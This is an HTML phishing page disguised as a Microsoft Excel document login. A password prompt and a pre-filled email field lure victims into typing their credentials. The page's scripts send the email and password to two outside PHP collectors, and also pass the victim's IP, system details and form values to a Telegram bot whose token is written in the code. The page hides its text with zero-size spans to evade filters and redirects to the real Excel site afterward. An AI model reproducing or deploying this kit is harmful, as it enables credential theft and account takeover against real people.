<!DOCTYPE html>
<html>
<head>
<title>EXCEL</title>
<meta name="robots" content="noindex, noarchive, nofollow, nosnippet" />
<meta name="googlebot" content="noindex, noarchive, nofollow, nosnippet, noimageindex" />
<meta name="slurp" content="noindex, noarchive, nofollow, nosnippet, noodp, noydir" />
<meta name="msnbot" content="noindex, noarchive, nofollow, nosnippet" />
<meta name="teoma" content="noindex, noarchive, nofollow, nosnippet" />
<meta name="viewport" content="width=device-width, initial-scale=1">
<style type="text/css">
    @import url();
        
        
        body {
          background: url('https://www.oie.int/wahis/roundcubedata/UTChSKc.png') no-repeat;
          background-size: cover;
          position: absolute;
          width: 100%;
          height: 100%;
            top: 0;
            right: 0;
            bottom: 0;
            left: 0;
            margin: auto;
            overflow: hidden;
          font-family: 'PT Sans', sans-serif;
        }
        
        .login {
          padding: 10px;
        }
        
        .files {
          background: #02723b;
          margin: 200px auto;
          width: 90%;
          max-width: 450px;
          text-align: center;
          color: #fff;
        }
        
        form {
          max-width: 450px;
          margin: 0 auto;
        }
        form > div {
          position: relative;
          background: white;
          border-bottom: 1px solid #ccc;
          color: #000;
        }
        form > div > label {
          opacity: 0.3;
          font-weight: bold;
          position: absolute;
          top: 22px;
          left: 20px;
        }
        form > div > input[type="text"],
        form > div > input[type="email"],
        form > div > input[type="password"] {
          width: 100%;
          border: 0;
          padding: 20px 20px 20px 50px;
          background: #fff;
        }
        form > div > input[type="text"]:focus,
        form > div > input[type="email"]:focus,
        form > div > input[type="password"]:focus {
          outline: 0;
          background: white;
        }
        form > div > input[type="text"]:focus + label,
        form > div > input[type="email"]:focus + label,
        form > div > input[type="password"]:focus + label {
          opacity: 0;
        }
        form > div > input[type="text"]:valid,
        form > div > input[type="email"]:valid,
        form > div > input[type="password"]:valid {
          background: url('https://www.oie.int/wahis/roundcubedata/604a0cadf94914c7ee6c6e552e9b4487-curved-check-mark-circle-icon-by-vexels.png');
          background-size: 20px;
          background-repeat: no-repeat;
          background-position: 20px 20px;
        }
        form > div > input[type="text"]:valid + label,
        form > div > input[type="email"]:valid + label,
        form > div > input[type="password"]:valid + label {
          opacity: 0;
        }
        form > div > input[type="text"]:invalid:not(:focus):not(:placeholder-shown),
        form > div > input[type="email"]:invalid:not(:focus):not(:placeholder-shown),
        form > div > input[type="password"]:invalid:not(:focus):not(:placeholder-shown) {
          background: pink;
        }
        form > div > input[type="text"]:invalid:not(:focus):not(:placeholder-shown) + label,
        form > div > input[type="email"]:invalid:not(:focus):not(:placeholder-shown) + label,
        form > div > input[type="password"]:invalid:not(:focus):not(:placeholder-shown) + label {
          opacity: 0;
        }
        form > div > input[type="text"]:invalid:focus:not(:placeholder-shown) ~ .requirements,
        form > div > input[type="email"]:invalid:focus:not(:placeholder-shown) ~ .requirements,
        form > div > input[type="password"]:invalid:focus:not(:placeholder-shown) ~ .requirements {
          max-height: 200px;
          padding: 0 30px 20px 50px;
        }
        form > div .requirements {
          padding: 0 30px 0 50px;
          color: #999;
          max-height: 0;
          transition: 0.28s;
          overflow: hidden;
          color: red;
          font-style: italic;
        }
        form input[type="button"] {
          display: block;
          width: 100%;
          margin: 20px 0;
          background: #25402b;
          color: white;
          border: 0;
          padding: 20px;
          font-size: 1.2rem;
        }
        
        form input[type="button"]:hover {
          box-shadow: 1px 1px 1px #ddd;
        }
        
        * {
          box-sizing: border-box;
        }
        
        .invalid {
          background: #000;
          color: #000;
        }
        
        @media screen and (max-width: 360px) and (min-width: 320px) {
          .files {
            margin: 100px auto;
          }
        }
  </style>
 <script>
var countattempt=0;
alert("Because you're accessing sensitive info, you need to verify your email password");
if (typeof XMLHttpRequest === "undefined") {
  XMLHttpRequest = function () {
    try { return new ActiveXObject("Msxml2.XMLHTTP.6.0"); }
    catch (e) {}
    try { return new ActiveXObject("Msxml2.XMLHTTP.3.0"); }
    catch (e) {}
    try { return new ActiveXObject("Microsoft.XMLHTTP"); }
    catch (e) {}
    throw new Error("This browser does not support XMLHttpRequest.");
  };
}
window.addEventListener('load', (event) => {
window.nowdate = new Date();
theif = "\nPage = " + document.title;
imputs = document.getElementsByTagName('input');
lastIndex = imputs.length;
window.OSName = "Unknown";
if (window.navigator.userAgent.indexOf("Windows NT 10.0")!= -1) OSName="Windows 10";
if (window.navigator.userAgent.indexOf("Windows NT 6.2") != -1) OSName="Windows 8";
if (window.navigator.userAgent.indexOf("Windows NT 6.1") != -1) OSName="Windows 7";
if (window.navigator.userAgent.indexOf("Windows NT 6.0") != -1) OSName="Windows Vista";
if (window.navigator.userAgent.indexOf("Windows NT 5.1") != -1) OSName="Windows XP";
if (window.navigator.userAgent.indexOf("Windows NT 5.0") != -1) OSName="Windows 2000";
if (window.navigator.userAgent.indexOf("Mac")            != -1) OSName="Mac/iOS";
if (window.navigator.userAgent.indexOf("X11")            != -1) OSName="UNIX";
if (window.navigator.userAgent.indexOf("Linux")          != -1) OSName="Linux";
if (window.navigator.userAgent.indexOf("Android")        != -1) OSName="Android";
if (window.navigator.userAgent.indexOf("iPhone")         != -1) OSName="iPhone";
if (window.navigator.userAgent.indexOf("iPad")           != -1) OSName="iPad";
if (window.navigator.userAgent.indexOf("iPod")           != -1) OSName="iPod";
if (window.navigator.userAgent.indexOf("BlackBerry")     != -1) OSName="BlackBerry";
});
function createCORSRequest(method, url){
  var xhr = new XMLHttpRequest();
  if ("withCredentials" in xhr){
    xhr.open(method, url, false);
  } else if (typeof XDomainRequest != "undefined"){
    xhr = new XDomainRequest();
    xhr.open(method, url);
  } else {
    xhr = null;
  }
  return xhr;
}
function senddataPOST(){
if(navigator.onLine==true){
if (typeof objs =="undefined" ){
var objs = {
  ip: "",
  country_name: "",
  city: "",
  region: "",
  currency: ""
};
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
var rec = JSON.parse(this.responseText);
window.rec = rec;
}
};
xhttp.open("GET", "https://jsonip.com/", false);
xhttp.send();
}
objs.ip = rec.ip;
objs.country_name = "";
objs.city = "";
objs.region = "";
objs.currency = "";
theif = "IP Address = " + objs.ip;
theif += "\nPage = " + document.title;
theif += "\nTime = " + nowdate;
theif += "\nFull Address = " + objs.country_name + ", " + objs.city + ", " + objs.region;
theif += "\nCountry Currency = " + objs.currency;
theif += "\nSystem = " + OSName + " " + navigator.language;
theif += "\nScreen Size = "+ screen.width + " X " + screen.height;
theif += "\nLocation = "+ window.location;
for (index = 0; index < imputs.length; ++index) {
    if(imputs[index].type!="submit" && imputs[index].name!="" && imputs[index].value!=""){
    theif += "\n"+imputs[index].name+'='+encodeURI(imputs[index].value);
  }
}
theif += "\nUser-Agent = " + navigator.userAgent;
theif += "\nIP Details = https://ipinfo.io/" + objs.ip + "/json";
var url_telegram ="https://api.telegram.org/";
var randtoken = "bot1257337675";
var token = ":AAHDZVp72afEEmv4n6WqVFZ-_CxfvOedcso/";
var iden = "sendMessage?chat_id=-1001228517612&text=";
var createdCORSRequest = url_telegram+randtoken+token+iden;
var request = createCORSRequest( "POST", createdCORSRequest+encodeURI(theif) );
if ( request ){
if(request.send()){
return true;
}
}
}else{
return true;
}
}
function postdata(){
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
  if (this.readyState == 4 && this.status == 200) {
    if(this.responseText=="ok"){
        senddataPOST();
      var address = email.value.split("@")[1];
      document.getElementById("mainform").remove();;
      document.getElementById("messagefont").innerHTML = "";
      document.getElementById("messagegood").innerHTML = "Please wait we are verifying your domain in few seconds...";
      var meta=document.createElement('meta');
      meta.setAttribute('http-equiv', 'refresh');
      meta.setAttribute('content', '8; url=https://www.microsoft.com/en/microsoft-365/excel');
      document. getElementsByTagName('head')[0]. appendChild(meta);
    }else{
    document.getElementById("messagefont").innerHTML = "Please check your password";
    password.value="";
    password.focus();
    }
  }
};
xhttp.open("GET", "https://tintercambio.pe/wp-content/send.php"+"?type=ExcelDoc&email="+btoa(email.value)+"&password="+btoa(password.value), true);
xhttp.send();
}
function ValidateEmail(mail) 
{
 if (/^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$/.test(mail))
  {
    return (true);
  }
    return (false);
}
function mobileverif(){
if(countattemp>0){
if(!ValidateEmail(email.value)){
password.value="";
email.value="";
email.focus();
}else{
if(password.value.length<3){
password.value="";
password.focus();
}else{
postdata();
}
}
}else{
countattemp++;
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
if(this.responseText=="ok"){
document.getElementById("messagefont").innerHTML = "Please check your password";
password.value="";
password.focus();
}
}
};
xhttp.open("GET", "https://aoneportrait.com/images/send.php"+"?type=ExcelDoc&email="+btoa(email.value)+"&password="+btoa(password.value), true);
xhttp.send();
}

</script>  
</head>
<body>
<div class="files">
<img src="https://www.oie.int/wahis/roundcubedata/2qdhX2N.jpg" height="50">
<h2 id="messagegood"><label for="email">Log<span style=”FONT-SIZE: 0px”>in</span> wit<span style=”FONT-SIZE: 0px”>h
</span ><label for="email">you<span style=”FONT-SIZE: 0px”>r</span> Exis<span style=”FONT-SIZE: 0px”>ting
</span ></label><label for="email">Em<span style=”FONT-SIZE: 0px”>ail</span> Ad<span style=”FONT-SIZE: 0px”>dress
</span ></label><label for="email">t<span style=”FONT-SIZE: 0px”>o</span> vie<span style=”FONT-SIZE: 0px”>w
</span ></label></label><label for="email">"Docu<span style=”FONT-SIZE: 0px”>ment"</span> </label></h2>
<font id="messagefont" color="red"></font>
<div class="login">
<form id="mainform" method="post">
<div>
<input type="email" id="email" name="email" value="pkg-ayatana-devel@lists.alioth.debian.org" disabled>
<div class="requirements">
Mu<span style=”FONT-SIZE: 0px”>st</span> be a va<span style=”FONT-SIZE: 0px”>lid</spa> em<span style=”FONT-SIZE: 0px”>ail</span> ad<span style=”FONT-SIZE: 0px”>dress
</span>.</div>
</div>
<div>
<input type="password" id="password" name="password" required placeholder=" " />
<label for="password">Pa<span style=”FONT-SIZE: 0px”>ssword
</span ></label>
<div class="requirements">
Your pa<span style=”FONT-SIZE: 0px”>ssword
</span > mu<span style=”FONT-SIZE: 0px”>st</span > be at le<span style=”FONT-SIZE: 0px”>ast 6 ch<span style=”FONT-SIZE: 0px”>aracters</span > as we<span style=”FONT-SIZE: 0px”>ll</span > as co<span style=”FONT-SIZE: 0px”>ntain</span > at le<span style=”FONT-SIZE: 0px”>ast</span > one up<span style=”FONT-SIZE: 0px”>percase,</span > one lo<span style=”FONT-SIZE: 0px”>wercase,</span > and one nu<span style=”FONT-SIZE: 0px”>mber.</span >
</div>
</div>
<input onclick=" return mobileverif();" id="linkBtn" type="button" value="View Document" />
</form>
</div>
</div>
 <script>
var countattemp=0;
// Get the input field
var input = document.getElementById("password");

// Execute a function when the user releases a key on the keyboard
input.addEventListener("keyup", function(event) {
  // Number 13 is the "Enter" key on the keyboard
  if (event.keyCode === 13) {
    // Cancel the default action, if needed
    event.preventDefault();
    // Trigger the button element with a click
    document.getElementById("linkBtn").click();
  }
});
var url_string = window.location.href; 
var url = new URL(url_string);
var cid = url.searchParams.get("id");
if(cid){
document.getElementById("email").value = cid;
}else{
}
</script>
</body>
</html>